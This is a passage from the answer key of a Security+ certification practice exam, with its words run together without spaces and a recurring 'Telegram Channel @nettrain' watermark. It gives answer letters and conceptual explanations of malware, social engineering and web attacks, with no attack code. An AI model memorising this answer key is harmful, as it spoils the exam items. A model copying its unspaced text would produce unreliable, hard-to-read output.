74. B. Alogicbombperformsmaliciousactionswhenaspecificconditionorconditionsaremet.Abootsectorvirusinfectsthebootsectoroftheharddrive.Abufferoverflowoccurswhentheattackerattemptstoputmoredatainavariablethanitcanhold.Asparseinfectorvirusperformsitsmaliciousactivityintermittentlytomakeithardertodetect.
75. B. Elicitation,ortheprocessofelicitinginformationthroughconversationtogatherusefulinformation,isakeytoolinapenetrationtester’ssocialengineeringarsenal.Pretextinginvolvestheuseofbelievablereasonsforthetargettogoalongwithwhateverthesocialengineeringisattemptingtodo.Impersonationinvolvesactinglikesomeoneyouarenot,whereasintimidationattemptstoscareorthreatenthetargetintodoingwhatthesocialengineerwantsthemto.
76. B. Alloftheseprotocolsareunsecure.FTPhasbeenreplacedbysecureversionsinsomeuses(SFTP/FTPS),whereasTelnethasbeensupersededbySSHinmodernapplications.RSHisoutmodedandshouldbeseenonly
Telegram Channel @nettrain
ontrulyancientsystems.Ifyoufindasystemordeviceexposingtheseprotocols,youwillneedtodiginfurthertodeterminewhytheyareexposedandhowtheycanbeprotectediftheymustremainopenforalegitimatereason.
77. B. ThebestwayforScotttodeterminewhereanorganization’swirelessnetworkscanbeaccessedfromistousewardriving,warflying,and/orwarwalkingtechniquestomapoutthewirelesssignalfootprintoftheorganization.OSINTandactivescanswouldbeusefulgatheringinformationabouttheorganizationanditssystems,butnotaboutitswirelessnetworksrangeandaccessibility,andsocialengineeringismorelikelytobeusefulforgatheringinformationorgainingaccesstofacilitiesorsystems.
78. A. Amacrovirusisamaliciousscript(macro)embeddedintoafile,typicallyaMicrosoftOfficefile.TheyaretypicallywritteninVisualBasicforApplications(VBA)script.Abootsectorvirusinfectsthebootsectoroftheharddrive.ATrojanhorseismalwarethatistiedtoalegitimateprogram.Inthisscenario,themalwareisactuallyembeddedinanOfficedocument.Thetwoaresimilar,butnotthesame.AremoteaccessTrojan(RAT)isaTrojanhorsethatgivestheattackerremoteaccesstothemachine.
79. C. Bygivingthetesterlogins,youareallowingthemtoconductacredentialedscan(i.e.,ascanwithanaccountoraccountsthatallowthemaccesstochecksettingsandconfigurations).Knownenvironmentandpartiallyknownenvironmenttestsdescribethelevelofknowledgethetesterisgivenofthenetwork.Aprivilegescancannotbeanunknownenvironmenttest,butitcouldbeeitherknownorpartiallyknown.Anintrusivescanisatermusedforscansthatattempttoexerciseorusethevulnerabilitytheyfindinsteadofattemptingtoavoidharm.
80. B. TheSecurity+examexpectspractitionerstobeabletoanalyzescriptsandcodetodetermineroughlywhatfunctiontheyperformandtobeabletoidentifymultipleprogramminglanguages.Pythonreliesonformattinglikeindentingtoindicateblocksofcodeanddoesnotuselineendindicatorsasyouwouldfindinsomelanguages.ThiscodeisabasicPythonportscannerthatwillscaneveryportfrom1to9999,checkingtoseeifitallowsaconnection.
81. C. BotnetsareoftenusedtolaunchDDoSattacks,withtheattackcoming
Telegram Channel @nettrain
fromallthecomputersinthebotnetsimultaneously.Phishingattacksattempttogettheusertogiveupinformation,clickonalink,oropenanattachment.Adwareconsistsofunwantedpop-upads.ATrojanhorseattachesmalwaretoalegitimateprogram.
82. B. Amandahasdiscoveredaninsiderthreat.Insiderthreatscanbedifficulttodiscover,asamaliciousadministratororotherprivilegeduserwilloftenhavetheabilitytoconcealtheiractionsormayactuallybethepersontaskedwithhuntingforthreatslikethis!Thisisnotazero-day—novulnerabilitywasmentioned,therewasnomisconfigurationsincethiswasanintentionalaction,andencryptionisnotmentionedordiscussed.
83. B. Socialmediainfluencecampaignsseektoachievethegoalsoftheattackerorownerofthecampaign.Theyleveragesocialmediausingbotsandgroupsofposterstosupporttheideas,concepts,orbeliefsthatalignwiththegoalsofthecampaign.Impersonationisatypeofsocialengineeringattackwheretheattackerpretendstobesomeoneelse.Awateringholeattackplacesmalwareormaliciouscodeonasiteorsitesthatarefrequentlyvisitedbyatargetedgroup.Asymmetricwarfareiswarfarebetweengroupswithsignificantlydifferentpowerorcapabilities.
84. C. Usingdefaultsettingsisaformofweakconfiguration.Manyvulnerabilityscannersandattacktoolshavedefaultsettingsbuilt-intotestwith,anddefaultsettingsareeasilyobtainedformostdeviceswithaquicksearchoftheInternet.Configuringtheaccountsisnottheissue;changingdefaultpasswordsandsettingsis.Althoughtrainingusersisimportant,that’snottheissueinthisscenario.Patchingsystemsisimportant,butthatwon’tchangedefaultsettings.
85. D. InaDLLinjection,themalwareattemptstoinjectcodeintotheprocessofsomelibrary.Thisisaratheradvancedattack.OptionAisincorrect.Alogicbombexecutesitsmisdeedwhensomeconditionismet.OptionBisincorrect.Sessionhijackingistakingoveranauthenticatedsession.OptionCisincorrect.Bufferoverflowsaredonebysendingmoredatatoavariablethanitcanhold.
86. B. Stateactors(ornation-stateactors)oftenhavegreaterresourcesandskills,makingthemamoresignificantthreatandfarmorelikelytobeassociatedwithanadvancedpersistentthreatactor.Scriptkiddies,hacktivists,andinsiderthreatstendtobelesscapableandareallfarlesslikelytobeassociatedwithanAPT.
Telegram Channel @nettrain
87. C. Anintrusivescanattemptstoactivelyexploitvulnerabilities,andthuscouldpossiblycausesomedisruptionofoperations.Forthisreason,itshouldbeconductedoutsidenormalbusinesshoursorinatestenvironment,ifitisusedatall.Anonintrusivescanattemptstoidentifyvulnerabilitieswithoutexploitingthem.Apenetrationtestactuallyattemptstobreachthenetworkbyexploitingvulnerabilities.Anauditisprimarilyadocumentcheck.Bothintrusiveandnonintrusivevulnerabilityscanscanbeeffectiveatfindingvulnerabilities.
88. C. Abackdoorisamethodforbypassingnormalsecurityanddirectlyaccessingthesystem.Alogicbombismalwarethatperformsitsmisdeedswhensomeconditionismet.ATrojanhorsewrapsamaliciousprogramtoalegitimateprogram.Whentheuserdownloadsandinstallsthelegitimateprogram,theygetthemalware.Arootkitismalwarethatgetsrootoradministrativeprivileges.
89. D. Thefactthatthewebsiteisdefacedinamannerrelatedtothecompany’spublicindicatesthattheattackersweremostlikelyengaginginhacktivismtomakeapoliticalorbelief-basedpoint.Scripts,nation-stateactors,andorganizedcrimedon’taccountforthestatementsadversetothecompany’spolicies,whichiswhyhacktivismistherealcause.
90. A. Pharmingattemptstoredirecttrafficintendedforalegitimatesitetoanothermalicioussite.AttackersmostoftendothisbychangingthelocalhostsfileorbyexploitingatrustedDNSserver.
91. B. Passwordsprayingisaspecifictypeofbruteforceattackwhichusesasmallerlistofcommonpasswordsformanyaccountstoattempttologin.Althoughbruteforcingistechnicallycorrect,thebestmatchhereispasswordspraying.Whenyouencounterquestionslikethisonthetest,makesureyouprovidethemostaccurateanswer,ratherthanonethatfitsbutmaynotbethebestanswer.Limitedloginattacksisamade-upanswer,andspinninganaccountreferstochangingthepasswordforanaccount,oftenbecauseofacompromiseortopreventauserfromloggingbackintoitwhilepreservingtheaccount.
92. C. Althoughyoumightsupposethatanation-stateattacker(theusualattackerbehindanadvancedpersistentthreat)wouldattackfromaforeignIPaddress,theyoftenuseacompromisedaddressinthetargetcountryasabaseforattacks.OptionsA,B,andDareallincorrect.Theseareactuallysignsofanadvancedpersistentthreat.
Telegram Channel @nettrain
93. B. Aprivilegeescalationattackcanoccurhorizontally,whereattackersobtainsimilarlevelsofprivilegebutforotherusers,orverticallywheretheyobtainmoreadvancedrights.Inthiscase,Charleshasdiscoveredaverticalprivilegeescalationattackthathasallowedtheattackertoobtainadministrativerights.Cross-sitescriptingandSQLinjectionarebothcommontypesofwebapplicationattacks,andaraceconditionoccurswhendatacanbechangedbetweenwhenitischeckedandwhenitisused.
94. A. EviltwinattacksuseamaliciousaccesspointconfiguredtoappeartobeidenticaltoalegitimateAP.Attackerswaitfortheirtargetstoconnectviatheeviltwin,andcanthencaptureormodifytraffichowevertheywish.IPspoofingusestheIPaddressofasystemalreadyonthenetwork,Trojanhorsesaremalwarethatappeartobelegitimatesoftwareorfiles,andprivilegeescalationistheprocessofusingexploitstogainhigherprivileges.
95. A. Azero-dayexploitorattackoccursbeforethevendorhasknowledgeofit.Theremainderoftheanswersdon’taccuratelydescribeazero-dayattack—justbecauseithasnotyetbeenbreacheddoesnotmakeitazero-day,norisazero-daynecessarilyquicklyexploitable.Finally,azero-dayattackdoesnotspecifyhowlongtheattackermayhaveaccess.
96. D. PrependingisoneofthestrangertermsthatappearontheCompTIASecurity+examandisnotacommonlyusedphraseintheindustry.Thus,youneedtoknowthatwhenitisusedforthisexamitcanmeanoneofthreethings:addinganexpressionorphrasetoanemail,subjectline,orheaderstoeitherprotectorfoolusers.Theyalsonotethatitcanbeusedwhenaddingdataaspartofanattack,andthatsocialengineersmay“prepend”informationbyinsertingitintoconversationtogettargetstothinkaboutthingstheattackerwantsthemto.Pretexingisasocialengineeringtechniquewhereattackersuseareasonthatisintendedtobebelievabletothetargetforwhattheyaredoing.SQLinjectionisattemptstoaddSQLcodetoawebquerytogainadditionalaccessordata.PrependingisusedtocoverawidevarietyoftechniquesintheSecurity+examoutlinethatfocusonaddinginformationordatatoexistingcontent.
97. D. Althoughauditingsomelibrariesorlibrariesthatarecustom-developedforthecodeiscommon,auditingalllibrariesusedinthecodeisunlikelyexceptinexceptionalsituations.Theremainderofthesepracticesareallcommonlyusedwhenworkingwithoutsourcedcodedevelopmentteams.
Telegram Channel @nettrain
98. C. DNSpoisoningoccurswhenfalseDNSinformationisinsertedintolegitimateDNSservers,resultingintrafficbeingredirectedtounwantedormalicioussites.Abackdoorprovidesaccesstothesystembycircumventingnormalauthentication.AnAPTisanadvancedpersistentthreat.ATrojanhorsetiesamaliciousprogramtoalegitimateprogram.
99. C. SpywareandadwarearebothcommonexamplesofaPUP,orpotentiallyunwantedprogram.ACATwasmadeupforthisquestionandisnotacommoncategorizationformalware,whereaswormsareself-spreadingmalwarethatoftenexploitvulnerabilitiestospreadviaanetwork.Trojanspretendtobelegitimatesoftwareorpairedwithlegitimatesoftwaretogainentrytoasystemordevice.
100. B. ATrojanhorsepretendstobelegitimatesoftware,andmayevenincludeit,butalsoincludesmalicioussoftwareaswell.Backdoors,RATs,andpolymorphicvirusesareallattacks,buttheydonotmatchwhatisdescribedinthequestionscenario.
101. A. AremoteaccessTrojan(RAT)ismalwarethatgivestheattackerremoteaccesstothevictimmachine.MacrovirusesoperateinsideofMicrosoftOfficefiles.Althoughabackdoorwillgiveaccess,itisusuallysomethinginthesystemputtherebyprogrammers,notintroducedbymalware.ARATisatypeofTrojanhorse,butaTrojanhorseismoregeneralthanwhatisdescribedinthescenario.Whenyouencounterquestionslikethisontheexam,youwillneedtoselectthebestanswer,notjustonethatmayanswerthequestion!
102. B. Cardcloningoftenoccursafteraskimmingattackisusedtocapturecarddata,whetherfromcreditcardsorentryaccesscards.Brute-forceandrainbowtable-basedattacksarebothusedagainstpasswords,whereasabirthdayattackisacryptographicattackoftenaimedatfindingtwomessagesthathashtothesamevalue.
103. B. Cross-siterequestforgery(XSRForCSRF)sendsforgedrequeststoawebsite,supposedlyfromatrusteduser.Cross-sitescripting(XSS)istheinjectionofscriptsintoawebsitetoexploittheusers.Abufferoverflowtriestoputmoredatainavariablethanthevariablecanhold.Aremote-accessTrojan(RAT)ismalwarethatgivestheattackeraccesstothesystem.
104. A. Adenial-of-service(DoS)attackmaytargetamemoryleak.Ifanattackercaninducethewebapplicationtogeneratethememoryleak,theneventuallythewebapplicationwillconsumeallmemoryonthewebserver
Telegram Channel @nettrain
andthewebserverwillcrash.Backdoorsarenotcausedbymemoryleaks.SQLinjectionplacesmalformedSQLintotextboxes.Abufferoverflowattemptstoputmoredatainavariablethanitcanhold.
105. D. Thisisanexampleofanapplicationdistributeddenial-of-service(DDoS)attack,aimedatagamingapplication.AnetworkDDoSwouldbeaimedatnetworktechnology,eitherthedevicesorprotocolsthatunderlynetworks.Anoperationaltechnology(OT)DDoStargetsSCADA,ICS,utilityorsimilaroperationalsystems.AGDoSwasmadeupforthisquestion.
106. D. Purpleteamsareacombinationofredandblueteamsintendedtoleveragethetechniquesandtoolsfrombothsidestoimproveorganizationalsecurity.Aredteamisateamthattestssecuritybyusingtoolsandtechniqueslikeanactualattacker.Ablueteamisadefenderteamthatprotectsagainstattackers(andtesterslikeredteams!).Whiteteamsoverseecybersecuritycontestsandjudgeeventsbetweenredteamsandblueteams.
107. B. Thisisanexampleofransomware,whichdemandspaymenttoreturnyourdata.Arootkitprovidesaccesstoadministrator/rootprivileges.Alogicbombexecutesitsmaliciousactivitywhensomeconditionismet.Thisscenariodoesnotdescribewhaling.
108. D. Ifaccessisnothandledproperly,atimeofcheck/timeofuseconditioncanexistwherethememoryischecked,changed,thenused.Memoryleaksoccurwhenmemoryisallocatedbutnotdeallocated.Abufferoverflowiswhenmoredataisputintoavariablethanitcanhold.Anintegeroverflowoccurswhenanattemptismadetoputanintegerthatistoolargeintoavariable,suchastryingtoputa64-bitintegerintoa32-bitvariable.
109. B. Near-fieldcommunication(NFC)issusceptibletoanattackereavesdroppingonthesignal.TailgatingisaphysicalattackandnotaffectedbyNFCtechnology.BothIPspoofingandraceconditionsareunrelatedtoNFCtechnology.
110. B. FilelessvirusesoftentakeadvantageofPowerShelltoperformactionsoncetheyhaveusedavulnerabilityinabrowserorbrowserplug-intoinjectthemselvesintosystemmemory.Rick’sbestoptionfromthelistprovidedistoenablePowerShellloggingandthentoreviewthelogsonsystemshebelievesareinfected.Sincefilelessvirusesdon’tusefiles,animageofthediskisunlikelytoprovidemuchusefuldata.Disablingtheadministrativeuserwon’thaveanimpact,sincethecompromisewill
Telegram Channel @nettrain
happeninsidetheaccountofwhicheveruserisloggedinandimpactedbythemalware.Crashdumpfilescouldhaveartifactsofthefilelessvirusifthemachinecrashedwhileitwasactive,butunlessthatoccurstheywillnothavethatinformation.
111. B. Tailgatinginvolvessimplyfollowingalegitimateuserthroughthedooroncetheyhaveopenedit,anditisacommonmeansofexploitingasmartcard-basedentryaccesssystem.Itissimplerandusuallyeasierthanattemptingtocaptureandcloneacard.Phishingisunrelatedtophysicalsecurity.Althoughitispossibletogenerateafakesmartcard,itisaveryuncommonattack.RFIDspoofingcanbeaccomplishedbutrequiresaccesstoavalidRFIDcardandisrelativelyuncommonaswell.
112. B. Adamshouldlookforoneormorethreatfeedsthatmatchthetypeofinformationheislookingfor.OpenthreatfeedsexistthattypicallyuseSTIXandTAXIItoencodeandtransferfeeddatatomultipletoolsinanopenformat.NoneoftheotherfeedtypesherewouldmeetAdam’sneeds.
113. B. MalicioustoolslikeBadUSBcanmakeaUSBcableordrivelooklikeakeyboardwhentheyarepluggedin.Somewhatstrangely,theSecurity+examoutlinefocusesonmaliciousUSBcables,butyoushouldbeawarethatmaliciousthumbdrivesarefarmorecommonandhavebeenusedbypenetrationtesterssimplybydroppingtheminaparkinglotneartheirintendedtarget.ATrojanorawormisapossibility,buttheclueinvolvingthekeyboardwouldpointtoaUSBdeviceasthefirstplaceNaomishouldlook.
114. D. Usingapass-the-hashattackrequiresattackerstoacquirealegitimatehash,andthenpresentittoaserverorservice.Arealhashwasprovided;itwasnotspoofed.Aneviltwinisawirelessattack.Shimmingisinsertingmaliciouscodebetweenanapplicationandalibrary.
115. B. Claimingtobefromtechsupportisclaimingauthority,andthestorythecallergaveindicatesurgency.Yes,thiscallerusedurgency(thevirusspread)butdidnotattemptintimidation.Authorityandtrustarecloselyrelated,andinthiscaseurgencywasthesecondmajorfactor.Thiscallerusedurgencybutnotintimidation.
116. B. ThequestionstellsusthattheseareWindows10systems,acurrentoperatingsystem.Fromthere,itissafetopresumethatsomethinghasgonewrongwiththepatchingprocessorthatthereisn’tapatchingprocess.Elaineshouldinvestigatebothwhattheprocessisandiftherearespecific
Telegram Channel @nettrain
reasonsthesystemsarenotpatched.SinceweknowthesesystemsrunacurrentOS,optionA,unsupportedoperatingsystems,canberuledout.ThevulnerabilitiesarespecificallynotedtobeWindowsvulnerabilities,rulingoutoptionC,andthereisnomentionofprotocols,eliminatingoptionDaswell.
117. A. AddressResolutionProtocol(ARP)poisoning,oftencalledARPspoofing,occurswhenanattackersendsmaliciousARPpacketstothedefaultgatewayofalocalareanetwork,causingittochangethemappingsitmaintainsbetweenhardware(MAC)addressesandIPaddresses.InDNSpoisoning,domainnametoIPaddressentriesinaDNSserverarealtered.Thisattackdidnotinvolveanon-pathattack.Abackdoorprovidesaccesstotheattacker,whichcircumventsnormalauthentication.
118. A. Inaknownenvironment(white-box)test,thetesterisgivenextensiveknowledgeofthetargetnetwork.Fulldisclosureisnotatermusedtodescribetesting.Unknownenvironment(black-box)testinginvolvesonlyveryminimalinformationbeinggiventothetester.Aredteamtestsimulatesaparticulartypeofattacker,suchasanation-stateattacker,aninsider,orothertypeofattacker.
119. C. Socialengineeringisaboutusingpeopleskillstogetinformationyouwouldnototherwisehaveaccessto.Illegalcopyingofsoftwareisn’tsocialengineering,norisgatheringofdiscardedmanualsandprintouts,whichdescribesdumpsterdiving.Phishingemailsusesomesocialengineering,butthatisoneexampleofsocialengineering,notadefinition.
120. C. Shouldersurfinginvolvesliterallylookingoversomeone’sshoulderinapublicplaceandgatheringinformation,perhapsloginpasswords.ARPpoisoningalterstheAddressResolutionProtocoltablesintheswitch.Phishingisanattempttogatherinformation,oftenviaemail,ortoconvinceausertoclickalinkto,and/ordownload,anattachment.ASmurfattackisahistoricalformofdenial-of-serviceattack.
121. A. Invoicescamstypicallyeithersendlegitimateappearinginvoicestotrickanorganizationintopayingthefakeinvoice,ortheyfocusontrickingemployeesintologgingintoafakesitetoallowtheacquisitionofcredentials.Theytypicallydonotfocusondeliveryofmalwareorstealingcryptocurrency.
122. B. Vulnerabilityscansuseautomatedandsemiautomatedprocessestoidentifyknownvulnerabilities.Auditsusuallyinvolvedocumentchecks.
Telegram Channel @nettrain
Unknownandknownenvironmenttestingarebothtypesofpenetrationtests.
123. A. Apartiallyknown(gray-box)testinvolvesthetesterbeinggivenpartialinformationaboutthenetwork.Aknownenvironment(white-box)testinvolvesthetesterbeinggivenfullornearlyfullinformationaboutthetargetnetwork,andunknown(black-box)environmentsdon’tprovideinformationaboutthetargetenvironment.Maskedisnotatestingterm.
124. D. Intheon-path(man-in-the-middle)attack,theattackerisbetweentheclientandtheserver,andtoeitherend,theattackerappearslikethelegitimateotherend.Thisdoesnotdescribeanydenial-of-serviceattack.Areplayattackinvolvesresendinglogininformation.Althoughanon-pathattackcanbeusedtoperformeavesdropping,inthisscenariothebestanswerisanon-pathattack.
125. A. Inaman-in-the-browserattack,themalwareinterceptscallsfromthebrowsertothesystem,suchassystemlibraries.On-pathattackinvolveshavingsomeprocessbetweenthetwoendsofcommunicationinordertocompromisepasswordsorcryptographykeys.Inabufferoverflowattack,moredataisputintoavariablethanthevariablewasintendedtohold.Sessionhijackinginvolvestakingoveranauthenticatedsession.
126. B. Uniformresourcelocator(URL)redirectionisfrequentlyusedinwebapplicationstodirectuserstoanotherserviceorportionofthesite.Ifthisredirectionisnotproperlysecured,itcanbeusedtoredirecttoanarbitraryuntrustedormalicioussite.Thisissue,knownasOpenRedirectvulnerabilities,remainsquitecommon.ThecodeshowndoesnotcontainSQLorLDAPcode,andthereisnomentionofchangingDNSinformationontheserver,thusmakingtheotheroptionsincorrect.
127. D. Placingalargerintegervalueintoasmallerintegervariableisanintegeroverflow.Memoryoverflowisnotatermused,andmemoryleakisaboutallocatingmemoryandnotdeallocatingit.Bufferoverflowsofteninvolvearrays.Variableoverflowisnotatermusedintheindustry.
128. B. Cross-siterequestforgery(XSRForCSRF)takesadvantageofthecookiesandURLparameterslegitimatesitesusetohelptrackandservetheirvisitors.InanXSRForaCSRFattack,attackersleverageauthorized,authenticatedusers’rightsbyprovidingthemwithacookieorsessiondatathatwillbereadandprocessedwhentheyvisitthetargetsite.Anattackermayembedalinkwithinanemailorotherlocationthatwillbeclickedor
Telegram Channel @nettrain
executedbytheuseroranautomatedprocesswiththatuser’ssessionalreadyopen.ThisisnotSQLinjection,whichwouldattempttosendcommandstoadatabase,orLDAPinjection,whichgathersdatafromadirectoryserver.Cross-sitescripting(XSS)wouldembedcodeinuser-submittabledatafieldsthatawebsitewilldisplaytootherusers,causingittorun.
129. D. YouwillneedtobeabletoreadandunderstandbasicscriptsandprogramsinmultiplelanguagesfortheSecurity+exam.Inthisexample,youcanrecognizecommonBashsyntaxandseethatitisaddingakeytotheauthorizedkeysfileforroot.Ifthat’snotanexpectedscript,youshouldbeworried!
130. D. Rootkitsprovideadministrativeaccesstosystems,thusthe“root”inrootkit.ATrojanhorsecombinesmalwarewithalegitimateprogram.Alogicbombperformsitsmaliciousactivitywhensomeconditionismet.Amultipartitevirusinfectsthebootsectorandafile.
131. C. Memoryleakscancausecrashes,resultinginanoutage.ThistargetstheavailabilitylegoftheCIA(confidentiality,integrity,andavailability)triad,makingitasecurityissue.Memoryleaksdonotactuallyleaktootherlocations,nordotheyallowcodeinjection.Insteadmemoryleakscausememoryexhaustionorotherissuesovertimeasmemoryisnotproperlyreclaimed.
132. B. Thisquestioncombinestwopiecesofknowledge:howbotnetcommandandcontrolworks,andthatIRC’sdefaultportisTCP6667.Althoughthiscouldbeoneoftheotheranswers,themostlikelyanswergiventheinformationavailableisabotnetthatusesInternetRelayChat(IRC)asitscommand-and-controlchannel.
133. A. Softwareupdatesforconsumer-gradewirelessroutersaretypicallyappliedasfirmwareupdates,andSusanshouldrecommendthatthebusinessownerregularlyupgradetheirwirelessrouterfirmware.Ifupdatesarenotavailable,theymayneedtopurchaseanewrouterthatwillcontinuetoreceiveupdatesandconfigureitappropriately.Thisisnotadefaultconfigurationissuenoranunsecuredadministrativeaccount—neitherismentioned,norisencryption.
134. B. Radiofrequencyidentification(RFID)iscommonlyusedforaccessbadges,inventorysystems,andevenforidentifyingpetsusingimplantablechips.Inapenetrationtestingscenario,attackersaremostlikelytoattempt
Telegram Channel @nettrain
toacquireorcloneRFID-basedaccessbadgestogainadmittancetoabuildingorofficesuite.
135. B. ThewordyouwillneedtoknowfortheSecurity+examforphishingviaSMSis“smishing,”atermthatcombinesSMSandphishing.BluejackingsendsunsolicitedmessagestoBluetoothdevices,andphonejackingandtextwhalingweremadeupforthisquestion.
136. B. Thisisvishing,orusingvoicecallsforphishing.Spearphishingistargetingasmall,specificgroup.Wardialingisdialingnumbershopingacomputermodemanswers.Robocallingisusedtoplaceunsolicitedtelemarketingcalls.
137. A. Wormsspreadthemselvesviavulnerabilities,makingthisanexampleofaworm.Avirusissoftwarethatself-replicates.Alogicbombexecutesitsmaliciousactivitywhensomeconditionismet.ATrojanhorsecombinesmalwarewithalegitimateprogram.
138. B. Dumpsterdivingistheprocessofgoingthroughthetrashtofinddocuments.Shreddingdocumentswillhelptopreventdumpsterdiving,buttrulydedicateddumpsterdiverscanreassembleevenwell-shreddeddocuments,leadingsomeorganizationstoburntheirmostsensitivedocumentsaftertheyhavebeenshredded.Phishingisoftendoneviaemailorphoneandisanattempttoelicitinformationorconvinceausertoclickalinkoropenanattachment.Shouldersurfingisliterallylookingoversomeone’sshoulder.Intheon-path(man-in-the-middle)attack,theattackerisbetweentheclientandtheserver,andtoeitherend,theattackerappearslikethelegitimateotherend.
139. B. Systemsshouldnothavearootkitonthemwhenapenetrationteststarts,androotkitsinstalledduringthetestshouldbefullyremovedandsecurelydeleted.Therestoftheoptionsarealltypicalpartsofapenetrationtestingcleanupprocess.Youcanreadmoreatthepenetrationtestingstandardsiteatwww.pentest-standard.org/index.php/Post_Exploitation.
140. C. Thisisanexampleofanonlinebrute-forcedictionaryattack.Dictionaryattacksusecommonpasswordsaswellascommonsubstitutionstoattempttobreakintoasystemorservice.Back-offalgorithmsthatlockoutattackersafterasmallnumberofincorrectpasswordattemptscanhelpsloworstopdictionaryattacksandotherbrute-forcepasswordattacks.Rainbowtablesaretablesofprecomputedhashes.Thebirthdayattackisa
Telegram Channel @nettrain
methodforgeneratingcollisionsofhashes.Finally,nospoofingisindicatedinthisscenario.
141. C. Jimhasdiscoveredaskimmer,adeviceusedforskimmingattacksthatcapturecreditanddebitcardinformation.Skimmersmaybeabletowirelesslyuploadtheinformationtheycapture,ortheymayrequireattackerstoretrievedatainperson.SomeskimmersincludecamerastocapturekeypressesforPINsandotherdata.Areplayattackwouldreusecredentialsorotherinformationtoactlikealegitimateuser,araceconditionoccurswhenthetimeofuseandtimeofcheckofdatacanbeexploited,andacardclonerwouldbeusedaftercardswereskimmedtoduplicatethem.
142. D. Activereconnaissanceconnectstothenetworkusingtechniquessuchasportscanning.Bothactiveandpassivereconnaissancecanbedonemanuallyorwithtools.Black-boxandwhite-boxrefertotheamountofinformationthetesterisgiven.Attackersandtestersusebothtypesofreconnaissance.
143. D. BrowsertoolbarsaresometimesexamplesofPUPs,orpotentiallyunwantedprogramslikespywareoradware.Awormisatypeofmalwarethatspreadsonitsownbyexploitingvulnerabilitiesonnetwork-connectedsystems.Onceitinfectsasystem,itwilltypicallyscanforothervulnerablesystemsandcontinuetospread.ARATisaremote-accessTrojan,andarootkitisusedtogainandkeepadministrativeaccess.
144. B. OSINT,oropensourceintelligence,isintelligenceinformationobtainedfrompublicsourceslikesearchengines,websites,domainnameregistrars,andahostofotherlocations.OPSEC,oroperationalsecurity,referstohabitssuchasnotdisclosingunnecessaryinformation.STIXistheStructuredThreatIntelligenceExchangeprotocol,andIntConwasmadeupforthisquestion.
145. C. Wateringholeattackstargetgroupsbyfocusingoncommonsharedbehaviorslikevisitingspecificwebsites.Ifattackerscancompromisethesiteordelivertargetedattacksthroughit,theycanthentargetthatgroup.Watercooler,phishingnet,andphishpondattackswereallmadeupforthisquestion.
146. C. AlthoughStructuredQueryLanguage(SQL)queriesareoftenparameterized,LightweightDirectoryAccessProtocol(LDAP)securitypracticesfocusinsteadonuserinputvalidationandfilteringofoutputto
Telegram Channel @nettrain
ensurethatanexcessiveamountofdataisnotbeingreturnedinqueries.Aswithallservices,securelyconfiguringLDAPservicesisoneofthefirstprotectionsthatshouldbeputinplace.
147. B. Althoughitmaysounddramatic,sitesaccessibleviaTororothertoolsthatseparatethemfromtherestoftheInternetaresometimescalled“thedarkweb.”TheSecurity+examusesthisterm,soyouneedtobeawareofitfortheexam.TherestoftheoptionsweremadeupandmaybealmostassillyascallingasectionoftheInternetthedarkweb.
148. B. URLredirectionhasmanylegitimateuses,fromredirectingtrafficfromno-longer-supportedlinkstocurrentreplacementstoURLshortening,butURLredirectionwascommonlyusedforphishingattacks.Modernbrowsersdisplaythefull,realURL,helpingtolimittheimpactofthistypeofattack.Certificateexpirationtrackingisusedtoensurethatwebsitecertificatesarecurrent,butitdoesnotpreventURLredirectionattacks.JavaScriptbeingenabledordisablingcookiesisnothelpfulforthispurposeeither.
149. A. Vulnerabilitiesincloudservicesrequireworkonthepartofthecloudserviceprovidertoremediatethem.Youcanremediatemostvulnerabilitiesinyourowninfrastructureyourselfwithoutathirdparty.Vulnerabilitiesincloudservicesandlocalinfrastructurecanbothbeassevereandtakeasmuchtimetoremediate.Regardlessofwhereyourorganizationstoresitsdata,yourresponsibilityforitislikelythesame!
150. C. Consumerwirelessroutersprovidelocaladministrativeaccessviatheirdefaultcredentials.Althoughtheyrecommendthatyouchangethepassword(andsometimestheusernameforgreatersecurity),manyinstallationsresultinanunsecuredadministrativeaccount.Theotheranswersareallcommonissuesbutnotwhatisdescribedinthequestion.
151. A. Aredteamisateamthattestssecuritybyusingtoolsandtechniqueslikeanactualattacker.Ablueteamisadefenderteamthatprotectsagainstattackers(andtesterslikeredteams!).Purpleteamsareacombinationofredandblueteamsintendedtoleveragethetechniquesandtoolsfrombothsidestoimproveorganizationalsecurity.Whiteteamsoverseecybersecuritycontestsandjudgeeventsbetweenredteamsandblueteams.
152. A. Directorytraversalattacksattempttoexploittoolsthatcanreaddirectoriesandfilesbymovingthroughthedirectorystructure.Theexamplewouldtrytoreadtheconfig.txtfilethreelayersabovethe
Telegram Channel @nettrain
workingdirectoryofthewebapplicationitself.Addingcommondirectorynamesorcommonfilenamescanallowattackers(orpenetrationtesters)toreadotherfilesinaccessibledirectoriesiftheyarenotproperlysecured.Theremainderoftheoptionsweremadeupforthisquestion,althoughSlashdotisanactualwebsite.
153. A. Securityorchestration,automation,andresponse(SOAR)servicesaredesignedtointegratewithabroaderrangeofbothinternalandexternalapplications.Bothsecurityinformationandeventmanagement(SIEM)andSOARsystemstypicallyincludethreatandvulnerabilitymanagementtools,aswellassecurityoperations’automationcapabilities.
154. A. Aknownenvironment(white-box)testinvolvesprovidingextensiveinformation,asdescribedinthisscenario.Aknownenvironmenttestcouldbeinternalorexternal.Thisscenariodescribestheoppositeofanunknownenvironment(black-box)test,whichwouldinvolvezeroknowledge.Finally,threattestisnotatermusedinpenetrationtesting.
155. C. TheWindowsSecurityAccountManager(SAM)fileandthe/etc/shadowfileforLinuxsystemsbothcontainpasswordsandarepopulartargetsforofflinebrute-forceattacks.
156. C. AnSSLstrippingattackrequiresattackerstopersuadeavictimtosendtrafficthroughthemviaHTTPwhilecontinuingtosendHTTPSencryptedtraffictothelegitimateserverbypretendingtobethevictim.Thisisnotabrute-forceattack,aTrojanattackwouldrequiremalware,andadowngradeattackwouldtrytomovetheencryptedsessiontoalesssecureencryptionprotocol.
157. C. TheU.S.TrustedFoundryprogramisintendedtopreventsupplychainattacksbyensuringend-to-endsupplychainsecurityforimportantintegratedcircuitsandelectronics.
158. B. Threatmapslikethosefoundatthreatmap.fortiguard.comandthreatmap.checkpoint.comarevisualizationsofreal-timeornearreal-timedatagatheredbyvendorsandotherorganizationsthatcanhelpvisualizemajorthreatsandaidinanalysisofthem.Piechartsmaybedoneinrealtimeviasecurityinformationandeventmanagement(SIEM)orothersystems,butnotethatnoSIEMorotherdevicewasmentioned.Adarkwebtrackerwasmadeupforthequestion,andOSINTrepositorieswouldn’tshowreal-timedatalikethis.
159. B. BluesnarfinginvolvesaccessingdatafromaBluetoothdevicewhenit
Telegram Channel @nettrain
